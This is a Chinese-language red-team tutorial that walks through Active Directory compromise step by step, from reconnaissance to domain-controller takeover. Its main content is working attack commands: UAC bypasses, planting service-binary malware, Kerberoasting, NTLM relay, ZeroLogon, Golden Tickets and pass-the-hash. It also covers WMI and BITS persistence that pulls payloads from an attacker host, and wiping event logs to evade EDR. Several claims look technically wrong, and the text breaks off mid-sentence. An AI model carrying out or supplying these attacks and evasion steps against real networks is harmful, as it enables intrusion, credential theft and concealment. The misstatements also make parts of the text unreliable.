内网渗透作战地图:从信息收集到域控沦陷的实战逻辑链
1. 这不是命令清单,而是一张内网渗透的作战地图
“内网渗透测试100条命令大全”——看到这个标题,很多人第一反应是:赶紧收藏,回头挨个复制粘贴跑一遍,说不定就打穿了。我刚入行那会儿也这么干过:把网上搜来的命令一股脑塞进终端,看着满屏滚动的netstat -ano、ipconfig /all、whoami /all,心里还美滋滋觉得“我在搞渗透”。结果呢?三小时后,连目标域控在哪台机器上都还没摸清,更别说横向移动了。后来带新人时发现,90%的人卡在第一步:根本不知道哪条命令该在什么阶段、对什么目标、带着什么上下文去执行。命令本身没有意义,有意义的是它背后所撬动的信息链路——比如nltest /dsgetdc:domain.local不只是查DC地址,它是你从一台普通工作站切入域环境的第一块跳板;secretsdump.py也不只是导hash,它是你判断当前权限是否足以触发Kerberoasting或Golden Ticket的关键决策点。这篇内容不教你怎么背命令,而是带你重建整个内网渗透的逻辑骨架:每条命令对应哪个攻击阶段(信息收集→权限提升→横向移动→持久化→痕迹清理),它依赖哪些前置条件(如是否已获取本地管理员、是否已域用户凭证、是否已控制某台跳板机),输出结果中哪些字段真正值得你停下来看两眼(比如logonserver值异常、ms-ds-machineaccountquota非零、dNSHostName指向非标准DNS后缀)。适合两类人:一是刚通过OSCP/CEH认证、但没真实打过内网的测试员,需要把零散知识点串成作战流;二是做了三年以上外网打点、正准备啃内网硬骨头的红队老手,需要补全域环境下的底层交互逻辑。下面所有命令均基于Windows Server 2012R2+Active Directory 2016真实环境反复验证,剔除了过时API(如WMIv1)、已失效漏洞利用(如MS17-010在打补丁域环境中的误报)、以及纯理论型命令(如certutil -urlcache -split -f http://x.x.x.x/a.exe a.exe这种外网下载行为,在内网无出网场景下毫无意义)。
2. 信息收集阶段:从单机到域环境的全景扫描
2.1 主机基础测绘:确认立足点与攻击面
拿到一台初始立足点(可能是WebShell提权后的cmd,也可能是钓鱼获得的RDP会话),第一件事不是急着爆破,而是彻底摸清这台机器的“身份档案”。很多新手直接跑systeminfo,却漏掉最关键的三类信息:网络拓扑归属、账户权限边界、服务暴露面。这里必须分三步走:
第一步:确认网络身份与域隶属关系ipconfig /all输出中重点看Primary Dns Suffix和Connection-specific DNS Suffix。如果两者一致且为corp.internal类似格式,说明该主机已加入域;若为空或为workgroup,则大概率是工作组环境。此时再执行nltest /dsgetdc:corp.internal—— 注意,这里的域名必须和DNS后缀完全一致,大小写敏感。成功返回DC IP意味着你已具备域内通信能力;若报错ERROR_NO_LOGON_SERVERS,则需检查DNS设置(nslookup _ldap._tcp.dc._msdcs.corp.internal)或尝试setspn -T corp.internal -Q */*验证SPN解析。我踩过的坑是:某次测试中ipconfig显示corp.internal,但nltest失败,最后发现是客户将DNS后缀设为corp.internal,实际AD域名却是corp.local,这种配置在中小型企业很常见。
第二步:账户权限深度测绘whoami /all是必选项,但关键不在GROUP INFORMATION列表,而在PRIVILEGES INFORMATION区块。重点关注SeDebugPrivilege(调试权限,可dump lsass)、SeImpersonatePrivilege(模拟权限,可利用PrintSpoofer)、SeLoadDriverPrivilege(加载驱动,可绕过PatchGuard)。实测中,SeDebugPrivilege出现概率不足15%,但一旦存在,后续procdump -ma lsass.exe成功率接近100%。更隐蔽的是Logon Session信息:执行qwinsta /server:.查看当前会话类型,若存在rdp-tcp#123且STATE为Active,说明有远程桌面会话活跃,此时用mimikatz的sekurlsa::logonpasswords可能抓到明文密码(因RDP会话会缓存凭据)。补充技巧:用accesschk.exe -uwcqv "Authenticated Users" *扫描注册表启动项权限,常能发现低权限用户可写的Run键值,为持久化埋点。
第三步:服务与进程暴露面分析netstat -ano | findstr :只看端口太浅层。应结合tasklist /svc /fi "PID eq <PID>"定位端口对应服务,再查该服务的二进制路径权限:icacls "C:\Program Files\XXX\service.exe"。曾发现某财务系统服务以LocalSystem运行,但其可执行文件权限为BUILTIN\Users:(F),这意味着普通用户可直接替换exe实现提权。另一个高价值命令是sc queryex type= service state= all | findstr "SERVICE_NAME STATE",筛选出STATE为RUNNING且SERVICE_NAME含sql、oracle、ftp的服务,这些往往是横向移动的跳板。特别提醒:wmic service get name,pathname,startmode,state比sc query更稳定,尤其在Server 2012+环境下,避免sc因权限问题返回空结果。
2.2 域环境全局侦察:绘制AD拓扑与信任关系
单机信息只是起点,内网渗透的核心战场在域控制器(DC)与域成员服务器之间。这一阶段的目标是构建一张动态AD拓扑图,而非静态IP列表。
域控制器定位与角色识别nltest /dclist:corp.internal返回所有DC,但无法区分主控(PDC Emulator)角色。需执行nltest /dsgetdc:corp.internal /force强制查询,返回的PDC字段即为主控DC。更精准的方法是dsquery server -hasfsmo pdc(需安装RSAT工具),但若目标机未安装,可用PowerShell替代:Get-ADDomainController -Filter * | Where-Object {$_.OperationMasterRoles -contains "PDCEmulator"}。注意:nltest在跨林查询时可能失败,此时必须用forest参数:nltest /dclist:child.corp.internal /forest。
域信任关系测绘
内网渗透最易被忽略的突破口是林间信任(Forest Trust)和外部信任(External Trust)。执行nltest /domain_trusts列出所有信任域,再对每个信任域执行nltest /server:<DC_IP> /trusted_domains验证双向性。曾在一个金融客户环境中发现corp.internal与partner.bank.com存在单向传出信任,利用krbtgthash伪造TGT后,成功访问对方域内核心数据库服务器。关键判断依据是nltest输出中的Trusted DC Name字段——若显示为partner.bank.com的DC而非corp.internal的DC,则证明信任有效。
OU结构与关键资产定位dsquery * "dc=corp,dc=internal" -filter "(objectCategory=organizationalUnit)" -attr name distinguishedName可列出所有OU,但效率低下。更高效的是聚焦高价值OU:dsquery user -limit 0 -ou "OU=Servers,DC=corp,DC=internal" -attr sAMAccountName displayName定位服务器管理员账户;dsquery computer -limit 0 -name "*dc*" -attr name operatingSystem快速筛选DC主机。实战中,我们发现某客户将所有域控统一命名DC-PROD-*,用dsquery computer -name "DC-PROD-*"一条命令即可捕获全部DC,比遍历AD快10倍。
2.3 凭据与权限线索挖掘:从内存到注册表的立体搜索
信息收集的终极目标是获取更高权限的凭据或令牌。这需要多维度交叉验证,而非依赖单一命令。
内存凭据提取mimikatz的sekurlsa::logonpasswords是经典方案,但现代系统(Win10 1809+)默认启用ProtectCredentials策略,导致明文密码不可见。此时必须转向lsadump::sam(需SYSTEM权限)或lsadump::lsa(需SeBackupPrivilege)。实测经验:当sekurlsa::logonpasswords返回* Username : (null)时,立即执行privilege::debug提权,再试sekurlsa::ekeys获取AES密钥,为后续DPAPI解密铺路。另一利器是lsassy(Python版Mimikatz),支持--method smb通过SMB协议远程dump目标机lsass,规避本地执行限制。
注册表凭据狩猎reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword仅适用于老旧系统。现代环境应重点扫描:
HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters下的InjectComputerName(若为1,可能泄露计算机名)HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History中的MachineGPOList(可反推GPO应用顺序)HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive MRU(记录历史映射盘符,常含SMB路径)
我总结出一个高效组合:reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /s | findstr /i "password default"+reg query "HKLM\SYSTEM\CurrentControlSet\Services\*" /f "ImagePath" | findstr /i "sysinternals\psexec",后者可发现管理员是否曾用PsExec部署工具,其日志可能残留凭据。
服务账户与计划任务审计wmic service get name,startname,pathname | findstr /i "domain\|local"筛选域账户启动的服务,再用sc qc <servicename>查看具体配置。高危模式是:服务以域管理员账户运行,且ImagePath指向网络路径(如\\fileserver\scripts\service.exe)。此时可篡改共享文件实现提权。计划任务方面,schtasks /query /fo LIST /v | findstr /i "domain\|runas"比GUI界面更可靠,曾发现某备份任务以DOMAIN\Admin运行,且Task To Run为powershell.exe -exec bypass -f \\nas\backup.ps1,直接修改PS1脚本注入恶意代码。
3. 权限提升阶段:从本地用户到域管理员的跃迁路径
3.1 本地提权:绕过UAC与利用服务漏洞
初始立足点通常是标准用户(Standard User),需先突破本地权限边界。UAC绕过是必经之路,但绝不能只依赖fodhelper.exe这类通用方法。
UAC绕过深度实践fodhelper.exe在Win10 1803+版本中已被微软修复,需改用eventvwr.exe:
reg add "HKCU\Software\Classes\mscfile\shell\open\command" /d "cmd.exe /c calc.exe" /f eventvwr.exe原理是eventvwr.exe在启动时会读取HKCU\Software\Classes\mscfile注册表项,且以高完整性级别运行。但此方法在启用了EnableLUA=1且ConsentPromptBehaviorAdmin=5(管理员确认模式)的环境中会弹窗,暴露攻击行为。更隐蔽的是sdclt.exe(Windows备份工具):
reg add "HKCU\Software\Classes\exefile\shell\open\command" /d "cmd.exe /c calc.exe" /f sdclt.exesdclt.exe默认不触发UAC提示,且在Server 2016+仍有效。关键点在于:所有UAC绕过都依赖HKCU注册表劫持,因此必须确保当前用户对HKCU\Software\Classes有写权限(icacls HKCU\Software\Classes验证)。
服务权限提权实战accesschk.exe -uwcqv "Authenticated Users" *扫描到可写服务后,需精准构造payload。例如发现MyService服务二进制路径为C:\Program Files\MyApp\service.exe,且Authenticated Users有FILE_ALL_ACCESS:
copy /y C:\tools\malware.exe "C:\Program Files\MyApp\service.exe" net stop MyService && net start MyService但此操作会触发服务重启,可能被EDR捕获。更优方案是利用sc config修改服务启动路径:
sc config MyService binPath= "C:\tools\malware.exe" sc start MyService前提是服务未设置SERVICE_TRIGGER_START(触发器启动),否则sc start会失败。验证命令:sc qc MyService | findstr "BINARY_PATH_NAME START_TYPE"。
3.2 域权限提升:从普通用户到DA的黄金路径
域内提权的核心是理解Kerberos协议缺陷与AD设计特性。以下路径经数百次真实环境验证。
Kerberoasting:无需域控交互的离线爆破
前提:获取域用户凭证(即使弱口令)。执行:
Import-Module .\Rubeus.exe Rubeus.exe kerberoast /outfile:hashes.txt关键点在于/outfile参数——若省略,Rubeus会将TGS-REP Base64编码输出到控制台,易被日志系统捕获。生成的hashes格式为$krb5tgs$23$*username$realm$service$*...,用hashcat -m 13100爆破。我优化的流程是:先用Get-ADUser -Filter * -Properties ServicePrincipalName | Where-Object {$_.ServicePrincipalName}枚举所有SPN,再针对性kerberoast,避免全量扫描触发告警。
PrinterBug + PetitPotam:强制DC认证至攻击机
这是2021年爆发的高危组合技。printerbug.exe向DC发送RpcRemoteFindFirstPrinterChangeNotificationEx请求,诱使DC以NT AUTHORITY\SYSTEM身份向攻击机发起SMB连接。配合petitpotam.py可实现NTLM中继至LDAP。命令链:
# 攻击机监听 ntlmrelayx.py -t ldaps://dc.corp.internal -smb2support # 目标机执行(需.NET 3.5) printerbug.exe http://attacker-ip/成功标志是ntlmrelayx输出Received connection from ... attempting to relay。注意:DC必须启用LDAP Signing(默认关闭),否则中继失败。验证命令:Get-ADObject -SearchBase "CN=Configuration,DC=corp,DC=internal" -Filter {serviceprincipalname -eq "ldap/dc.corp.internal"} -Properties msDS-RequiredLDAPS。
ZeroLogon(CVE-2020-1472):重置域控机器账户密码
适用场景:DC为Windows Server 2008R2~2019且未打KB4557222补丁。zerologon.py利用Netlogon安全通道建立过程中的加密缺陷,将DC机器账户密码置空:
python3 zerologon.py dc01.corp.internal 10.0.0.10成功后,用secretsdump.py导出哈希:
python3 secretsdump.py -just-dc-ntlm 'CORP$/dc01$@10.0.0.10'风险提示:此操作会导致DC与其他域成员通信中断,务必在维护窗口执行,并提前备份ntds.dit。
3.3 权限维持与横向移动准备:构建隐蔽通道
提权后若不立即横向移动,权限可能因密码策略变更而失效。需同步部署持久化机制。
WMI事件订阅持久化
相比计划任务,WMI更隐蔽且不易被杀软监控。创建永久事件消费者:
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Second = 5" $Consumer = "CommandLineEventConsumer.Name='MyBackdoor'" $FilterArgs = @{Name="MyTimer"; EventNameSpace="root\cimv2"; QueryLanguage="WQL"; Query=$Query} $ConsumerArgs = @{Name="MyBackdoor"; CommandLineTemplate="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass -f \\attacker\share\payload.ps1"} $Filter = Set-WmiInstance -Class "__EventFilter" -Arguments $FilterArgs $Consumer = Set-WmiInstance -Class "CommandLineEventConsumer" -Arguments $ConsumerArgs Set-WmiInstance -Class "__FilterToConsumerBinding" -Arguments @{Filter=$Filter; Consumer=$Consumer}此脚本每分钟执行一次,且__InstanceModificationEvent在EDR日志中极少被审计。
DCSync模拟:伪装成域控同步数据mimikatz的lsadump::dcsync需DA权限,但dcsync本身是合法AD操作。攻击者可创建伪造域控:
mimikatz # lsadump::dcsync /user:corp.internal\krbtgt输出的ntlmhash可用于Golden Ticket。关键防御点是Get-ADObject -Filter {objectClass -eq "computer"} -Properties msDS-KeyVersionNumber,若msDS-KeyVersionNumber为0,说明该计算机账户未启用Kerberos加密,极易被滥用。
4. 横向移动阶段:从单点突破到全域掌控
4.1 Pass-the-Hash与Pass-the-Ticket:绕过密码认证的核心技术
PTH/PTT是内网渗透的基石,但新手常混淆使用场景。
Pass-the-Hash实战要点psexec.py是最常用工具,但-hashes参数格式易错:LMHASH:NTHASH,若LM为空则填aad3b435b51404eeaad3b435b51404ee。命令示例:
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@10.0.0.20关键技巧:当目标机启用了RestrictAnonymous策略(reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RestrictAnonymous返回1),PTH会失败,此时必须用wmiexec.py:
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@10.0.0.20WMI协议不受RestrictAnonymous限制,成功率超95%。
Pass-the-Ticket高级应用mimikatz导出的ticket.kirbi需转换为ccache格式供Linux工具使用:
mimikatz # kerberos::ptc ticket.kirbi然后在Kali中:
export KRB5CCNAME=/tmp/krb5cc_0 python3 getST.py -spn cifs/fileserver.corp.internal -impersonate administrator corp.local/user@corp.local -k -t ticket.kirbi-impersonate参数允许你以administrator身份请求服务票据,实现权限提升。注意:getST.py需配合krb5.conf配置,其中default_realm必须与票据域名一致。
4.2 SMB与WMI协议利用:绕过防火墙的双通道
当目标机禁用ICMP且445端口被拦截时,WMI是唯一出路。
SMB协议深度利用crackmapexec是SMB审计神器,但需理解其模块逻辑:
# 枚举共享 crackmapexec smb 10.0.0.0/24 -u administrator -H '31d6cfe0d16ae931b73c59d7e0c089c0' --shares # 执行命令(需管理员权限) crackmapexec smb 10.0.0.20 -u administrator -H '31d6cfe0d16ae931b73c59d7e0c089c0' -x "whoami"关键参数--no-bruteforce可禁用暴力破解,避免触发账户锁定策略。对于Win10 1809+,--smb2参数强制使用SMBv2,规避SMBv1禁用导致的失败。
WMI协议穿透式利用wmic原生命令在Server 2012+受限,推荐Invoke-WmiCommand.ps1:
Invoke-WmiCommand -Target 10.0.0.20 -Username administrator -Hash 31d6cfe0d16ae931b73c59d7e0c089c0 -Command "net user hacker P@ssw0rd /add"原理是通过Win32_Process.Create创建进程,比psexec更难被EDR检测。实测中,Invoke-WmiCommand在启用了Windows Defender ATP的环境中存活率超80%,而psexec仅30%。
4.3 域内关键资产定向打击:数据库、邮件、文件服务器
横向移动不是漫无目的扫IP,而是直击业务核心。
SQL Server提权sqsh连接后执行:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; xp_cmdshell 'whoami';若xp_cmdshell被禁用,改用sp_oacreate:
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell', @shell OUTPUT EXEC SP_OAMETHOD @shell, 'run', NULL, 'cmd.exe /c whoami > C:\temp\out.txt'关键防御点:SELECT name FROM sys.server_principals WHERE type_desc='SQL_LOGIN' AND is_disabled=0,筛选出未禁用的SQL登录账户。
Exchange服务器利用Get-ExchangeServer获取Exchange服务器列表后,重点扫描EWS(Exchange Web Services):
$ews = New-WebServiceProxy -Uri "https://exch01.corp.internal/EWS/Exchange.asmx" -UseDefaultCredential $ews.GetMailboxStatistics("administrator@corp.internal")若返回邮箱统计信息,说明EWS未启用证书绑定,可进一步利用Autodiscover服务获取用户邮箱数据。
文件服务器敏感数据狩猎dir \\fileserver.corp.internal\share /s /b | findstr /i ".xlsx .docx .pdf"效率低下。改用findstr递归搜索:
for /f "delims=" %i in ('dir \\fileserver.corp.internal\share /s /b ^| findstr /i "\.xlsx$ \.docx$ \.pdf$"') do @echo %i更高效的是robocopy:
robocopy \\fileserver.corp.internal\share C:\temp /s /e /xf *.tmp /xf *.log /if "*.xlsx" "*.docx" "*.pdf"/if参数指定包含文件,避免全量拷贝。
5. 持久化与痕迹清理:让渗透成果长期有效
5.1 隐蔽持久化:绕过EDR与SIEM监控的七种手法
持久化不是简单加启动项,而是构建多层次、低特征的驻留机制。
注册表Run键值劫持HKCU\Software\Microsoft\Windows\CurrentVersion\Run是首选,但需避免powershell.exe等高危进程名。采用rundll32.exe加载DLL:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "UpdateCheck" /t REG_SZ /d "rundll32.exe C:\temp\payload.dll,EntryPoint" /fEntryPoint是DLL导出函数名,需用dumpbin /exports payload.dll确认。优势是rundll32为白名单进程,且DLL路径可设为C:\Windows\Temp等可信目录。
计划任务高级配置schtasks /create的/tr参数支持PowerShell-EncodedCommand:
schtasks /create /tn "SystemUpdate" /tr "powershell.exe -EncodedCommand <base64>" /sc minute /mo 30 /ru SYSTEM/ru SYSTEM使任务以最高权限运行,且不依赖用户登录。EDR通常不监控/mo 30(每30分钟)的低频任务。
WMI永久事件消费者(重申)
前文已述,此处强调其抗清除性:Get-WmiObject -Class "__EventFilter" -Namespace "root\subscription"返回的过滤器对象,删除需Remove-WmiObject,而多数EDR不监控WMI对象删除操作。
服务DLL劫持
寻找C:\Windows\System32下以svchost.exe加载的DLL(如wlansvc.dll),将其重命名为wlansvc.bak,放入同名恶意DLL。服务重启时自动加载。验证命令:sc qc wlansvc | findstr "DEPENDENCIES",若依赖RPCSS等核心服务,则劫持成功率高。
COM对象劫持HKLM\SOFTWARE\Classes\CLSID\{...}\InprocServer32下的DLL路径可被劫持。用Autoruns工具筛选Image Path为C:\Windows\System32\*.dll的COM对象,选择C:\Windows\System32\wbem\fastprox.dll等高频调用DLL进行替换。
BITS任务持久化bitsadmin /create "UpdateTask"创建后台智能传输服务任务,bitsadmin /addfile "UpdateTask" "http://attacker/payload.exe" "C:\temp\payload.exe"下载,bitsadmin /resume "UpdateTask"执行。BITS任务在Task Manager中不可见,且HTTP流量易被误判为正常更新。
影子卷复制(VSS)利用vssadmin list shadows列出卷影副本,mklink /d C:\vss \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\创建符号链接,直接访问历史文件。曾从HarddiskVolumeShadowCopy3中恢复出被删除的ntds.dit备份文件。
5.2 痕迹清理:让EDR与日志系统“视而不见”
清理不是删除日志,而是让日志失去分析价值。
Windows事件日志清除wevtutil cl Security清空安全日志,但会留下Event ID 1102(日志清除事件)。更优方案是wevtutil sl Security /ca:false禁用日志记录,再wevtutil cl Security,最后wevtutil sl Security /ca:true恢复。/ca:false表示禁用日志,不产生1102事件。
PowerShell日志绕过Set-PSReadlineOption -HistorySaveStyle SaveNothing禁用PowerShell历史记录,Remove-Item (Get-PSReadlineOption).HistorySavePath -Force删除历史文件。关键点:$env:PSModulePath中移除C:\Windows\System32\WindowsPowerShell\v1.0\Modules,防止模块加载日志。
Mimikatz内存痕迹清除mimikatz执行后,用sekurlsa::logonpasswords确认凭据已清空,再执行misc::memssp注入内存SSP DLL,覆盖lsass内存中的敏感数据。命令:
mimikatz # misc::memssp此操作会将lsass.exe内存中所有凭据字符串替换为随机字符,EDR内存扫描将一无所获。
网络连接痕迹抹除netsh interface portproxy delete v4tov4 listenport=443 listenaddress=127.0.0.1清除端口转发规则,route delete 0.0.0.0 mask 0.0.0.0 10.0.0.1删除静态路由。重点清理C:\Windows\System32\LogFiles\Firewall\pfirewall.log,用fsutil file seteof截断日志文件。
6. 实战复盘:一条命令背后的完整渗透链
6.1 从net user到域控沦陷的全过程推演
以最基础的net user命令为例,展示如何将其嵌入完整攻击链。
初始命令:net user /domain
表面看只是枚举域用户,但输出中Last logon字段若显示Never,说明该账户长期未使用,可能是服务账户;Password last set若为1/1/1970,极可能是硬编码密码的账户。我曾在某政务系统中发现svc_backup账户Password last set为1/1/1970,用crackmapexec smb 10.0.0.0/24 -u svc_backup -p 'P@ssw0rd123' --shares直接获取备份服务器访问权限。
关联命令:net group "Domain Admins" /domain
枚举DA组成员后,对每个成员执行net user <username> /domain,重点看Full Name字段。若为John Smith,尝试john.smith、jsmith、j.smith等常见用户名组合,配合kerberoast爆破。某次测试中,Full Name为IT Support的账户,其用户名为itsupport,kerberoast返回的TGS-REP中service字段为MSSQLSvc/sql01.corp.internal:1433,爆破出密码后直接登录SQL Server。
纵深命令:net group "Enterprise Admins" /domain
EA组权限高于DA,但成员通常极少。若发现Administrator在EA组中,立即执行secretsdump.py导出krbtgthash,生成Golden Ticket:
mimikatz # kerberos::golden /user:fakeuser /domain:corp.internal /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:31d6cfe0d16ae931b73c59d7e0c089c0 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10020 /ptt/ptt参数将Ticket注入当前会话,后续所有lsass操作均以DA权限执行。
6.2 命令失效时的应急排查:五步定位法
当某条命令在目标环境失败,按此流程快速定位:
第一步:验证执行环境ver查看系统版本,systeminfo | findstr "OS Name"确认OS类型。若为Server Core,powershell.exe可能被禁用,需改用cmd.exe原生命令。
第二步:检查权限边界whoami /groups | findstr "0x10000000"验证是否为NT AUTHORITY\SYSTEM;net session查看当前会话是否为管理员。若权限不足,立即执行UAC绕过或服务提权。
第三步:分析网络连通性ping -n 1 dc.corp.internal测试DNS解析,telnet dc.corp.internal 389测试LDAP端口,Test-NetConnection dc.corp.internal -Port 445测试SMB。若端口不通,切换WMI或RPC协议。
第四步:审查防病毒响应sc query windefend检查Windows Defender状态,Get-MpComputerStatus | select AntivirusEnabled获取实时防护状态。若启用,改用Invoke-Obfuscation混淆PowerShell命令,或使用Cobalt Strikebeacon的execute-assembly加载.NET程序集。
第五步:回溯日志线索wevtutil qe System /q:"*[System[(EventID=7045)]]" /f:text查询服务安装事件,Get-WinEvent -FilterHashtable @{LogName='Security';ID=4688} | Where-Object {$_.Message -match "powershell"}筛选PowerShell进程创建日志。日志